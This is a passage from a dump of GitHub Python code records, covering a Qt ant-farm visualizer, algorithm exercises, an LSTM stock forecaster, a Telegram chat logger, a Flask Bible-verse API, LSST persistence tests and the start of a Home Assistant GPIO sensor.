f'step {value} / {self.solution.number_of_steps - 1}')\n\n self.anim_control.stepChanged.connect(on_step_changed)\n on_step_changed(0)\n\n descr_label = QLabel(\"\"\"\n Space to play / pause
    \n D next step
    \n A previous step\n \"\"\")\n descr_label.setObjectName('second')\n layout.addWidget(descr_label, 1, alignBottom)\n\n def timerEvent(self, ev):\n self.update() # schedule widget repaint\n self.anim_control.update() # update ant animation\n\n def paintEvent(self, paintEvent):\n painter = QPainter(self)\n\n font = painter.font()\n font.setPixelSize(14)\n font.setBold(True)\n painter.setFont(font)\n\n # clear background\n painter.setBackground(QColor(\"#1D212D\"))\n painter.eraseRect(self.rect())\n\n self.apply_camera(painter)\n\n self.draw_links(painter)\n\n self.draw_rooms(painter)\n\n self.draw_solution_paths(painter)\n\n self.draw_ants(painter)\n\n # reset transform\n painter.resetMatrix()\n\n self.draw_room_names(painter)\n\n def mousePressEvent(self, ev):\n left_button_pressed = bool(ev.buttons() & Qt.LeftButton)\n\n if left_button_pressed:\n self.mouse_last_pos = ev.pos()\n\n def mouseMoveEvent(self, ev): # mouse move only triggered when a mouse button pressed\n dmouse = ev.pos() - self.mouse_last_pos\n self.camera.pos += self.zoom_reverse(QPointF(dmouse))\n self.mouse_last_pos = ev.pos()\n\n def wheelEvent(self, ev): # mouse wheel\n if ev.delta() < 0:\n self.camera.zoom /= 1.2\n else:\n self.camera.zoom *= 1.2\n\n # limit camera zoom level\n self.camera.zoom = clamp(self.camera.zoom, MIN_ZOOM, MAX_ZOOM)\n\n def keyPressEvent(self, ev):\n if ev.key() == Qt.Key_Space:\n self.anim_control.play_or_pause()\n elif ev.key() == Qt.Key_D:\n self.anim_control.rewind_forward()\n elif ev.key() == Qt.Key_A:\n self.anim_control.rewind_backward()\n\n def apply_camera(self, painter):\n mvp = self.mvp()\n painter.setTransform(mvp)\n\n def mvp(self):\n view_center = self.rect().center()\n mvp = QTransform()\n mvp.translate(view_center.x(), view_center.y())\n mvp.scale(self.camera.zoom, self.camera.zoom)\n mvp.translate(self.camera.pos.x(), self.camera.pos.y())\n return mvp\n\n def zoom_reverse(self, x):\n return x/self.camera.zoom\n\n def draw_links(self, painter):\n painter.setPen(self.link_pen)\n painter.drawPath(self.link_layer)\n\n def draw_solution_paths(self, painter):\n pen_num = len(self.solution_path_pens)\n for i, path in enumerate(self.solution_paths):\n painter.setPen(self.solution_path_pens[i % pen_num])\n painter.drawPath(path)\n\n def draw_rooms(self, painter):\n painter.setPen(self.room_pen)\n for room in self.map.rooms.values():\n painter.drawPoint(room.coords.x, room.coords.y)\n\n def draw_ants(self, painter):\n if self.solution.error:\n return\n\n num_of_pens = len(self.solution_path_pens)\n for i, ants_on_path in enumerate(self.path_ants.values()):\n painter.setPen(self.ant_pens[i % num_of_pens])\n for ant in ants_on_path:\n painter.drawPoint(QPointF(ant.x, ant.y))\n\n def draw_room_names(self, painter):\n if self.map.error:\n return\n\n # manually transform text position to draw text unaffected by zoom\n painter.setPen(self.text_pen)\n mvp = self.mvp()\n rect = QRectF(-100, self.room_size /\n 2, 200, self.room_size)\n\n for room in self.solution.all_rooms:\n screen_c = mvp.map(QPointF(room.coords.x, room.coords.y))\n painter.drawText(rect.translated(screen_c),\n Qt.AlignCenter, room.name)\n\n start_room = self.map.start_room\n start_coord = mvp.map(\n QPointF(start_room.coords.x, start_room.coords.y))\n\n end_room = self.map.end_room\n end_coord = mvp.map(QPointF(end_room.coords.x, end_room.coords.y))\n\n painter.setPen(self.special_text_pen)\n painter.drawText(rect.translated(start_coord),\n Qt.AlignCenter, start_room.name + \"\\n\")\n\n painter.drawText(rect.translated(\n end_coord), Qt.AlignCenter, end_room.name + \"\\n\")\n\n\ndef init_and_run(map, solution):\n # Create the Qt Application\n app = QApplication()\n # Create and show the form\n view = View(map, solution)\n view.resize(800, 600)\n view.show()\n # Run the main Qt loop\n sys.exit(app.exec_())\n","repo_name":"arptra/lem-in","sub_path":"lemin42-visual/lemin_vis/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"73312933681","text":"p1 = list(input().split())\np2 = list(input().split())\n\nd1 = {}\nd2 = {}\nd3 = {}\n\n\nlist1 = []\n\n\nfor i in range(1,len(p1),2):\n if float(p1[i+1]) !=0:\n d1[int(p1[i])] = float(p1[i+1])\nfor i in range(1,len(p2),2):\n if float(p2[i+1]) !=0:\n d2[int(p2[i])] = float(p2[i+1])\n \nfor k1 in d1:\n for k2 in d2:\n temp = d3.get(k1+k2,0) + d1.get(k1)*d2.get(k2)\n if temp !=0:\n d3[k1+k2] = round(temp,1)\n else:\n del d3[k1+k2]\nlist1 = [str(len(d3))] \nif len(d3) != 0: \n for i in sorted(d3.keys(),reverse = True):\n list1.append(str(i))\n list1.append(str(d3[i]))\nelse:\n list1.append(str(0))\n list1.append(str(0))\n\nprint(' '.join(list1))","repo_name":"francislinking/PTA-codes","sub_path":"PAT Advance/PAT_A1009.py","file_name":"PAT_A1009.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41809614776","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 0-1 Knapsack Problem using Dynamic Programming.\n# Using Tabulation Method (Filling table in Bottom-up manner)\n# Time Complexity is O(nW)\n\n\n# In[32]:\n\n\ndef knapsack(maxW, weight, val, items):\n # Initializing the table[][] with 0s\n table=[ [0 for x in range(maxW+1)] for x in range(items+1) ] \n \n # ci = current Item\n # cw = current Weight\n for ci in range(items+1):\n for cw in range(maxW+1):\n \n if ci ==0 or cw == 0: # Filling 1st row and column with 0\n table[ci][cw]=0\n \n elif weight[ci-1] <= cw: # if the current weight can be included in the bag capacity\n val_CI = val[ci-1] # Value of Current Item\n val_RW = cw - weight[ci-1] # Max Value of Remaining weight from the current weight\n including = val_CI + table[ci-1][val_RW] # Including current item\n notIncluding = table[ci-1][cw] # Not Including current item\n \n table[ci][cw] = max(including, notIncluding)\n \n # -------------- OR IN 1 LINE --------------#\n \n # table[ci][cw] = max(val[ci-1] + table[ci-1][cw-weight[ci-1]] , table[ci-1][cw])\n \n else:\n table[ci][cw]= table[ci-1][cw] \n \n # The last value in the table is our final answer\n print(\"Answer is : \" , table[ci][cw])\n # Printing the table for reference\n print(\"\\n\",table)\n\n\n# In[33]:\n\n\nval = [60,100,120]\nweight = [10,20,30]\nmaxW = 50\nitems = len(val)\nknapsack(maxW, weight, val, items)\n\n\n# In[ ]:\n\n\n# stay Tuned :)\n\n","repo_name":"Harshhg/python_data_structures","sub_path":"Dynamic Programming/py code/0-1 Knapsack_Problem_DP.py","file_name":"0-1 Knapsack_Problem_DP.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"34524231362","text":"class Solution:\r\n def countPoints(self, rings: str) -> int:\r\n d = {}\r\n for i in range(0,len(rings)-1,2):\r\n if rings[i+1] in d.keys():\r\n d[rings[i+1]].add(rings[i])\r\n else:\r\n d.__setitem__(rings[i+1],set(rings[i]))\r\n ans = 0\r\n for i in d.values():\r\n if len(i)==3:\r\n ans+=1\r\n return ans","repo_name":"srawan-meesala/leetcode-solutions","sub_path":"Rings And Rods.py","file_name":"Rings And Rods.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37549832923","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\ndef dfs(x, arr):\n global cnt\n if len(arr) == 7:\n cnt.append(arr)\n return\n for i in range(x, 25):\n if not visit[i]:\n visit[i] = 1\n dfs(i, arr+[i])\n visit[i] = 0\n\n\nboard = [[i for i in input()] for _ in range(5)]\nidx = [(-1, 0), (1, 0), (0, -1), (0, 1)]\ncnt = []\nvisit = [0]*25\ndfs(0, [])\nres = 0\nfor check in cnt:\n nums = [[0]*5 for _ in range(5)]\n xx = check[0] // 5\n yy = check[0] % 5\n path = board[xx][yy]\n queue = [(xx, yy)]\n nums[xx][yy] = 1\n flag = 0\n for x, y in queue:\n for dx, dy in idx:\n if 0 <= x+dx < 5 and 0 <= y+dy < 5 and nums[x+dx][y+dy] == 0 and 5*(x+dx) + y+dy in check:\n path += board[x+dx][y+dy]\n if path.count('Y') >= 4:\n flag = 1\n break \n queue.append((x+dx, y+dy))\n nums[x+dx][y+dy] = 1\n if flag == 1:\n break\n if flag == 0 and len(queue) == 7:\n res += 1\nprint(res)","repo_name":"seoul-ssafy-class-2-studyclub/hyeonhwa","sub_path":"baekjoon/1941_소문난칠공주.py","file_name":"1941_소문난칠공주.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"28971866769","text":"# LEETDCODE@ 474. Ones and Zeroes\n#\n# 1) Backpack problem\n#\n# 2) Because we encounter one more condition is that 0s & 1s, we have\n# to extend the 2-d dp to 3-d dp.\n#\n# --END--\n\n\ndef findMaxForm(self, strs, m, n):\n counter = []\n for s in strs:\n counter.append([0, 0])\n for c in s:\n if c == '0':\n counter[-1][0] += 1\n else:\n counter[-1][1] += 1\n l = len(strs)\n\n # 1) dp initialization\n dp = [[[0 for j in range(n + 1)] for i in range(m + 1)] for k in range(l + 1)]\n for k in range(1, l + 1):\n for i in range(m + 1):\n for j in range(n + 1):\n if i - counter[k - 1][0] >= 0 and j - counter[k - 1][1] >= 0:\n dp[k][i][j] = max(dp[k][i][j], dp[k - 1][i - counter[k - 1][0]][j - counter[k - 1][1]] + 1)\n dp[k][i][j] = max(dp[k][i][j], dp[k - 1][i][j])\n return dp[l][m][n]\n","repo_name":"Lancher/coding-challenge","sub_path":"dp/*ones_zeros.py","file_name":"*ones_zeros.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11987244583","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport math\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport matplotlib.pyplot as plt \nfrom datetime import datetime, timedelta\nfrom collections import deque\n\ndef forecast(df):\n\n df_1=df.reset_index()['Close']\n scaler = MinMaxScaler(feature_range=(0,1))\n arr = np.array(df_1).reshape(-1,1)\n df_1 = scaler.fit_transform(arr)\n\n #train test splitting\n training_size = int(len(df_1)*0.70)\n test_size = len(df_1) - training_size\n train_data,test_data = df_1[0:training_size,:],df_1[training_size:len(df_1),:1]\n\n # convert an array of values into a dataset matrix\n def create_dataset(dataset, time_step=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-time_step-1):\n a = dataset[i:(i+time_step), 0] ###i=0, 0,1,2,3-----99 100 \n dataX.append(a)\n dataY.append(dataset[i + time_step, 0])\n return np.array(dataX), np.array(dataY)\n \n time_step = 100\n X_train, y_train = create_dataset(train_data, time_step)\n X_test, ytest = create_dataset(test_data, time_step)\n\n # reshape input to be [samples, time steps, features] which is required for LSTM\n X_train =X_train.reshape(X_train.shape[0],X_train.shape[1] , 1)\n X_test = X_test.reshape(X_test.shape[0],X_test.shape[1] , 1)\n\n model=Sequential()\n model.add(LSTM(50,return_sequences=True,input_shape=(X_train.shape[1],1)))\n model.add(LSTM(50,return_sequences=True))\n model.add(LSTM(50))\n model.add(Dense(1))\n model.compile(loss='mean_squared_error',optimizer='adam')\n\n model.fit(X_train,y_train,validation_data=(X_test,ytest),epochs=1,batch_size=64,verbose=1)\n\n ### Lets Do the prediction and check performance metrics\n train_predict=model.predict(X_train)\n test_predict=model.predict(X_test)\n\n ##Transformback to original form\n train_predict=scaler.inverse_transform(train_predict)\n test_predict=scaler.inverse_transform(test_predict)\n\n st.subheader(\"Mean Squared :red[Error].\")\n st.markdown(\"#\")\n col1, col2 = st.columns(2)\n col1.metric(\"Train Prediction\",f\"{round(math.sqrt(mean_squared_error(y_train,train_predict)))}\",\"- Error\")\n col2.metric(\"Test Prediction\",f\"{round(math.sqrt(mean_squared_error(ytest,test_predict)))}\",\"- Error\")\n st.markdown(\"#\")\n # st.info(math.sqrt(mean_squared_error(y_train,train_predict)))\n # st.info(math.sqrt(mean_squared_error(ytest,test_predict)))\n\n # shift train predictions for plotting\n look_back=100\n trainPredictPlot = np.empty_like(df_1)\n trainPredictPlot[:, :] = np.nan\n trainPredictPlot[look_back:len(train_predict)+look_back, :] = train_predict\n # shift test predictions for plotting\n testPredictPlot = np.empty_like(df_1)\n testPredictPlot[:, :] = np.nan\n testPredictPlot[len(train_predict)+(look_back*2)+1:len(df_1)-1, :] = test_predict\n\n # plot baseline and predictions\n # plt.plot(scaler.inverse_transform(df_1))\n # plt.plot(trainPredictPlot)\n # plt.plot(testPredictPlot)\n # plt.show()\n\n # fig = go.Figure()\n # trace1 = px.line(scaler.inverse_transform(df_1))\n # trace2 = px.line(trainPredictPlot)\n # trace2.update_traces(line_color='orange')\n # trace3 = px.line(testPredictPlot)\n # trace3.update_traces(line_color='green')\n # fig.add_trace(trace1.data[0])\n # fig.add_trace(trace2.data[0])\n # fig.add_trace(trace3.data[0])\n # fig.update_layout(showlegend=False)\n # st.plotly_chart(fig,use_container_width=True,theme=\"streamlit\")\n\n st.subheader(\"Visualizing :blue[Train] and :blue[Test] Prediction.\")\n\n df['Close Price'] = scaler.inverse_transform(df_1)\n df['Train Predict Plot'] = trainPredictPlot\n df['Test Predict Plot'] = testPredictPlot\n\n figt = px.line(df,x=df['Date'],y=df['Close Price'])\n figt.add_scatter(x=df['Date'],y=df['Train Predict Plot'],name=\"Train prediction\")\n figt.add_scatter(x=df['Date'],y=df['Test Predict Plot'],name=\"Test prediction\",marker=dict(color='orange'))\n st.plotly_chart(figt,use_container_width=True,theme=\"streamlit\")\n\n x_input = df_1[len(df_1)-100:].reshape(1,-1)\n temp_input=list(x_input)\n temp_input=temp_input[0].tolist()\n\n # demonstrate prediction for next 30 days\n lst_output=[]\n n_steps=100\n i=0\n while(i<30):\n \n if(len(temp_input)>100):\n #print(temp_input)\n x_input=np.array(temp_input[1:])\n # print(\"{} day input {}\".format(i,x_input))\n x_input=x_input.reshape(1,-1)\n x_input = x_input.reshape((1, n_steps, 1))\n #print(x_input)\n yhat = model.predict(x_input, verbose=0)\n # print(\"{} day output {}\".format(i,yhat))\n temp_input.extend(yhat[0].tolist())\n temp_input=temp_input[1:]\n #print(temp_input)\n lst_output.extend(yhat.tolist())\n i=i+1\n else:\n x_input = x_input.reshape((1, n_steps,1))\n yhat = model.predict(x_input, verbose=0)\n # print(yhat[0])\n temp_input.extend(yhat[0].tolist())\n # print(len(temp_input))\n lst_output.extend(yhat.tolist())\n i=i+1\n\n #forecast plotting with matplotlib\n # day_new=np.arange(1,101)\n # day_pred=np.arange(101,131)\n\n # fig = plt.figure()\n # plt.plot(day_new,scaler.inverse_transform(df_1[len(df_1)-100:]))\n # plt.plot(day_pred,scaler.inverse_transform(lst_output))\n # st.pyplot(fig)\n\n st.subheader(\"Forecasting share prices over the next :orange[30 days] using data from the preceding :blue[100 days].\")\n #new forecast plotting with plotly\n data = []\n for value in scaler.inverse_transform(df_1[len(df_1)-100:]):\n data.append(value[0])\n \n for value in scaler.inverse_transform(lst_output):\n data.append(value[0])\n\n end_date = datetime.strptime(max(df['Date']),\"%Y-%m-%d\")\n dates = []\n for i in range(100):\n dates = deque(dates)\n dates.appendleft(end_date.date() - timedelta(days=i))\n dates = list(dates)\n\n for i in range(30):\n dates.append(end_date.date() + timedelta(days=(i+1)))\n\n forecast_df = pd.DataFrame(data, columns=['Value'])\n forecast_df['Date'] = dates\n\n forecast_plot_fig = px.line(forecast_df, x=forecast_df['Date'][:100],y=forecast_df['Value'][:100])\n forecast_plot_fig.add_scatter(x=forecast_df['Date'][100:],y=forecast_df['Value'][100:],name = 'Forecasted Share Price',marker=dict(color=\"orange\"))\n forecast_plot_fig.update_layout(xaxis_title=\"Date\",yaxis_title=\"Price\")\n st.plotly_chart(forecast_plot_fig,use_container_width=True,theme=\"streamlit\")\n\n # fig2 = go.Figure()\n # trace1 = px.line(y=scaler.inverse_transform(df_1[len(df_1)-100:]),x=day_new)\n # trace2 = px.line(y=scaler.inverse_transform(lst_output),x=day_pred)\n # trace2.update_traces(line_color='orange')\n # fig2.add_trace(trace1.data[0])\n # fig2.add_trace(trace2.data[0])\n # st.plotly_chart(fig2,use_container_width=True,theme=\"streamlit\")","repo_name":"zeel-04/Stock-price-prediction-using-LSTM","sub_path":"LSTM_model.py","file_name":"LSTM_model.py","file_ext":"py","file_size_in_byte":7257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5216786270","text":"\nfrom pyrogram.types import Message\n\nfrom app_init import app_init, verify_logger_group\n\n\napp = app_init()\n\nverify_logger_group(app)\n\n\n@app.on_message()\nasync def my_handler(client, message: Message):\n m = await app.get_messages(message.chat.id, message.id)\n print(m)\n # ID чата\n chat_id = str(m.chat.id)\n # Получаем ID Юзера\n # print(repr(m))\n\n sender_id = m.sender_chat.id if 'from_user' not in repr(m) else m.from_user.id\n # Получаем ID сообщения\n msg_id = m.id\n # Получаем юзера\n sender = m.from_user.username if 'from_user' in repr(m) else 'Channel'\n # Получаем имя юзера\n from_name = ' '.join([str(m.from_user.first_name),\n str(m.from_user.last_name)]) if 'from_user' in repr(m) else 'Channel'\n # print(m.from_user.first_name, m.from_user.last_name)\n # получаем имя группы\n chat_title = m.chat.title if 'title' in repr(m.chat) else m.chat.username\n\n # полчаем текст сообщения\n msg = ['*no text message*'] if m.text is None else m.text.split('\\n')\n msg = msg[0]\n with open(\"Chat_log.txt\", 'a', encoding='utf-8') as f:\n f.writelines(f\"ID: {m.date} {chat_id} {chat_title} >> \"\n f\"(ID: {sender_id}) {from_name} ({sender}) - (ID: {msg_id}) {msg}\\n\")\n print(f\"ID: {m.date} {chat_id} {chat_title} >> (ID: {sender_id}) {from_name} ({sender}) - (ID: {msg_id}) {msg}\")\n\n\nprint('Tele_log is running')\napp.run()\n","repo_name":"DipodDP/TeleTools","sub_path":"tele_log.py","file_name":"tele_log.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26634415632","text":"import os\nfrom flask import Blueprint, request, jsonify, current_app\nimport requests\nfrom app.models.verse import Verse, Topic\nfrom app import db\n\nverse_bp = Blueprint('verse', __name__)\n\n@verse_bp.route('/assign_topic', methods=['POST'])\ndef assign_topic():\n verse_id = request.json.get('verse_id')\n topic_id = request.json.get('topic_id')\n\n verse = Verse.query.get(verse_id)\n topic = Topic.query.get(topic_id)\n\n if not verse or not topic:\n return jsonify({'message': 'Verse or topic not found'}), 404\n\n verse.topics.append(topic)\n db.session.commit()\n\n return jsonify({'message': 'Verse assigned to topic successfully'}), 201\n\n@verse_bp.route('/get_verses_by_topic', methods=['GET'])\ndef get_verses_by_topic():\n topic_id = request.args.get('topic_id')\n\n topic = Topic.query.get(topic_id)\n\n if not topic:\n return jsonify({'message': 'Topic not found'}), 404\n\n verses = topic.verses.all()\n verse_texts = [verse.text for verse in verses]\n\n return jsonify({'verses': verse_texts})\n\n\n@verse_bp.route('/search_verses', methods=['GET'])\ndef search_verses():\n search_query = request.args.get('query')\n\n if not search_query:\n return jsonify({'message': 'Search query is required'}), 400\n\n \n # Retrieve the BIBLE_API_KEY from .env file\n api_key = current_app.config['BIBLE_API_KEY']\n bibleVersionID = 'de4e12af7f28f599-01'\n offset = 0\n\n if not api_key:\n return jsonify({'message': 'Bible API key is missing'}), 500\n\n # Retrieve verses from the Bible API based on search query\n\n headers = {'api-key': api_key, 'accept': 'application/json'}\n api_url = f'https://api.scripture.api.bible/v1/bibles/{bibleVersionID}/search?query={search_query}&offset={offset}'\n\n response = requests.get(api_url, headers=headers)\n\n if response.status_code != 200:\n return jsonify({'message': 'Failed to retrieve verses from the API'}), 500\n\n verses_data = response.json()['data']['verses']\n # Extract and format the relevant verse information from the API response\n verses = [{'text': verse_data['text'], 'reference': verse_data['reference']} for verse_data in verses_data]\n\n return jsonify({'verses': verses})","repo_name":"Hannah1Watkins/Backend_Bible_Verse_App","sub_path":"app/routes/verse_routes.py","file_name":"verse_routes.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19482324176","text":"import os\nimport json\n\nfrom ensenso_nxlib import NxLibCommand, NxLibException\nfrom ensenso_nxlib.helper import fix_nxlib_prefix, convert_camel_to_upper_snake\n\nfrom bin import file_appender as appender\n\nGENERATED_FILE_PATH = \"constants_generated.py\"\nDELETE_AND_GENERATE_NEW_FILE = \"w\"\n\nCONSTANTS_PREFIX = {'Commands': 'cmd', 'Errors': 'err', 'Items': 'itm',\n 'Values': 'val', 'ApiErrors': 'NxLib', 'ItemTypes': 'NxLib'}\n\n\ndef generate_constants_from_loaded_lib():\n print(\"Generating ensenso_nxlib constants...\")\n cmd = NxLibCommand(\"GetConstants\")\n cmd.execute()\n result = cmd.result()\n itm = result.as_json()\n json_object = json.loads(itm)\n\n # Create the py file\n file_object = open(GENERATED_FILE_PATH, DELETE_AND_GENERATE_NEW_FILE)\n for constant_type in json_object:\n # In order to ignore command results like time etc.\n if(isinstance(json_object[constant_type], list)):\n\n prefix = CONSTANTS_PREFIX[constant_type]\n for constant in json_object[constant_type]:\n variable_name = None\n value = None\n if isinstance(constant, dict):\n variable_name = prefix + constant['Name']\n value = constant['Value']\n else:\n variable_name = prefix + constant\n value = str(constant)\n variable_name = convert_camel_to_upper_snake(variable_name)\n if variable_name.startswith('NX_LIB'):\n variable_name = fix_nxlib_prefix(variable_name)\n\n if isinstance(value, str):\n file_object.write(\n \"{} = \\\"{}\\\"\\n\".format(variable_name, value))\n else:\n file_object.write(\n \"{} = {}\\n\".format(variable_name, value))\n\n file_object.close()\n\n print(\"...finished.\")\n\n pass\n\n\nif __name__ == '__main__':\n generate_constants_from_loaded_lib()\n\n current_directory = os.path.dirname(os.path.realpath(__file__))\n repo_directory = os.path.dirname(current_directory)\n output_name = \"constants.py\"\n package_name = \"ensenso_nxlib\"\n\n print(\"Writing constants module {} to package {}\".format(output_name, package_name))\n appender.file_appender(['header_part.txt', 'constants_generated.py', 'execute_part.txt'],\n current_directory,\n output_name,\n os.path.join(repo_directory + \"/\" + package_name, output_name))\n print(\"Please install ensenso_nxlib package now in order to make the new generated {} module available\".format(output_name))\n","repo_name":"ensenso/nxlib-python-interface","sub_path":"bin/nx_constants_generator.py","file_name":"nx_constants_generator.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"} +{"seq_id":"29943142535","text":"import os\nimport unittest\nimport lsst.daf.persistence as dp\nimport lsst.utils.tests\nimport shutil\nimport tempfile\n\ntry:\n FileType = file\nexcept NameError:\n from io import IOBase\n FileType = IOBase\n\n\nROOT = os.path.abspath(os.path.dirname(__file__))\n\n\ndef setup_module(module):\n lsst.utils.tests.init()\n\n\nclass GetParentFromSymlink(unittest.TestCase):\n \"\"\"A test case for getting the relative path to parent from a symlink in PosixStorage.\"\"\"\n\n def setUp(self):\n self.testDir = tempfile.mkdtemp(dir=ROOT, prefix='GetParentFromSymlink-')\n self.parentFolderPath = os.path.join(self.testDir, \"theParent\")\n self.childFolderPath = os.path.join(self.testDir, \"theChild\")\n self.parentlessFolderPath = os.path.join(self.testDir, \"parentlessRepo\")\n for p in (self.parentFolderPath, self.childFolderPath, self.parentlessFolderPath):\n os.makedirs(p)\n relpath = os.path.relpath(self.parentFolderPath, self.childFolderPath)\n os.symlink(relpath, os.path.join(self.childFolderPath, '_parent'))\n\n def tearDown(self):\n if os.path.exists(self.testDir):\n shutil.rmtree(self.testDir)\n\n def testV1RepoWithParen(self):\n parentPath = dp.PosixStorage.getParentSymlinkPath(self.childFolderPath)\n self.assertEqual(parentPath, os.path.relpath(self.parentFolderPath, self.childFolderPath))\n\n def testV1RepoWithoutParent(self):\n parentPath = dp.PosixStorage.getParentSymlinkPath(self.parentlessFolderPath)\n self.assertEqual(parentPath, None)\n\n\nclass TestRelativePath(unittest.TestCase):\n \"\"\"A test case for the PosixStorage.relativePath function.\"\"\"\n\n def setUp(self):\n self.testDir = tempfile.mkdtemp(dir=ROOT, prefix='TestRelativePath-')\n\n def tearDown(self):\n if os.path.exists(self.testDir):\n shutil.rmtree(self.testDir)\n\n def testRelativePath(self):\n \"\"\"Test that a relative path returns the correct relative path for\n 1. relative inputs, 2. absolute inputs.\"\"\"\n abspathA = os.path.join(self.testDir, 'a')\n abspathB = os.path.join(self.testDir, 'b')\n os.makedirs(abspathA)\n os.makedirs(abspathB)\n # 1.\n relpathA = os.path.relpath(abspathA)\n relpathB = os.path.relpath(abspathB)\n relpathAtoB = dp.PosixStorage.relativePath(relpathA, relpathB)\n self.assertEqual('../b', relpathAtoB)\n # 2.\n relpathAtoB = dp.PosixStorage.relativePath(abspathA, abspathB)\n self.assertEqual('../b', relpathAtoB)\n\n\nclass TestAbsolutePath(unittest.TestCase):\n \"\"\"A test case for the PosixStorage.absolutePath function.\"\"\"\n\n def setUp(self):\n self.testDir = tempfile.mkdtemp(dir=ROOT, prefix='TestAbsolutePath-')\n\n def tearDown(self):\n if os.path.exists(self.testDir):\n shutil.rmtree(self.testDir)\n\n def testAbsolutePath(self):\n \"\"\"Tests that given a path and a relative path, the correct aboslute\n path to the relative path is returned.\"\"\"\n abspathA = os.path.join(self.testDir, 'a')\n abspathB = os.path.join(self.testDir, 'b')\n os.makedirs(abspathA)\n os.makedirs(abspathB)\n relpathA = os.path.relpath(abspathA)\n self.assertEqual(abspathB,\n dp.PosixStorage.absolutePath(abspathA, '../b'))\n self.assertEqual(abspathB,\n dp.PosixStorage.absolutePath(relpathA, '../b'))\n\n\nclass TestGetLocalFile(unittest.TestCase):\n \"\"\"A test case for the PosixStorage.getLocalFile function.\"\"\"\n\n def setUp(self):\n self.testDir = tempfile.mkdtemp(dir=ROOT, prefix='TestGetLocalFile-')\n\n def tearDown(self):\n if os.path.exists(self.testDir):\n shutil.rmtree(self.testDir)\n\n def testAbsolutePath(self):\n \"\"\"Tests that GetLocalFile returns a file when it exists and returns\n None when it does not exist.\"\"\"\n storage = dp.PosixStorage(self.testDir, create=True)\n self.assertIsNone(storage.getLocalFile('foo.txt'))\n with open(os.path.join(self.testDir, 'foo.txt'), 'w') as f:\n f.write('foobarbaz')\n del f\n f = storage.getLocalFile('foo.txt')\n self.assertIsInstance(f, FileType)\n self.assertEqual(f.read(), 'foobarbaz')\n f.close()\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n pass\n\n\nif __name__ == '__main__':\n lsst.utils.tests.init()\n unittest.main()\n","repo_name":"lsst-dm/legacy-daf_persistence","sub_path":"tests/test_posixStorage.py","file_name":"test_posixStorage.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"17437886524","text":"from db import DB\nfrom unittest.mock import Mock\n\n\ndef test_db_connection_real():\n db_real = DB() # db simulates slow database connection\n assert len(db_real.list_tables()) == 3\n assert db_real.list_tables() == (\"users\", \"products\", \"orders\")\n\n\ndef test_db_connection_mock():\n db_mock = Mock()\n db_mock.list_tables.return_value = (\"users\", \"products\", \"orders\")\n assert len(db_mock.list_tables()) == 3\n assert db_mock.list_tables() == (\"users\", \"products\", \"orders\")\n","repo_name":"mihaivalentistoica/Softwer-Testing-Advance-Feauture","sub_path":"02-mock/test_example-02.py","file_name":"test_example-02.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20415751495","text":"\"\"\"\nSupport for binary sensor using Beaglebone Black GPIO.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/binary_sensor.bbb_gpio/\n\"\"\"\nimport logging\n\nimport voluptuous as vol\n\nimport homeassistant.components.bbb_gpio as bbb_gpio\nfrom homeassistant.components.binary_sensor import (\n BinarySensorDevice, PLATFORM_SCHEMA)\nfrom homeassistant.const import (DEVICE_DEFAULT_NAME, CONF_NAME)\nimport homeassistant.helpers.config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nDEPENDENCIES = ['bbb_gpio']\n\nCONF_PINS = 'pins'\nCONF_BOUNCETIME = 'bouncetime'\nCONF_INVERT_LOGIC = 'invert_logic'\nCONF_PULL_MODE = 'pull_mode'\n\nDEFAULT_BOUNCETIME = 50\nDEFAULT_INVERT_LOGIC = False\nDEFAULT_PULL_MODE = 'UP'\n\nPIN_SCHEMA = vol.Schema({\n vol.Required(CONF_NAME): cv.string,\n vol.Optional(CONF_BOUNCETIME, default=DEFAULT_BOUNCETIME): cv.positive_int,\n vol.Optional(CONF_INVERT_LOGIC, default=DEFAULT_INVERT_LOGIC): cv.boolean,\n vol.Optional(CONF_PULL_MODE, default=DEFAULT_PULL_MODE):\n vol.In(['UP', 'DOWN'])\n})\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_PINS, default={}):\n vol.Schema({cv.string: PIN_SCHEMA}),\n})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the Beaglebone Black GPIO 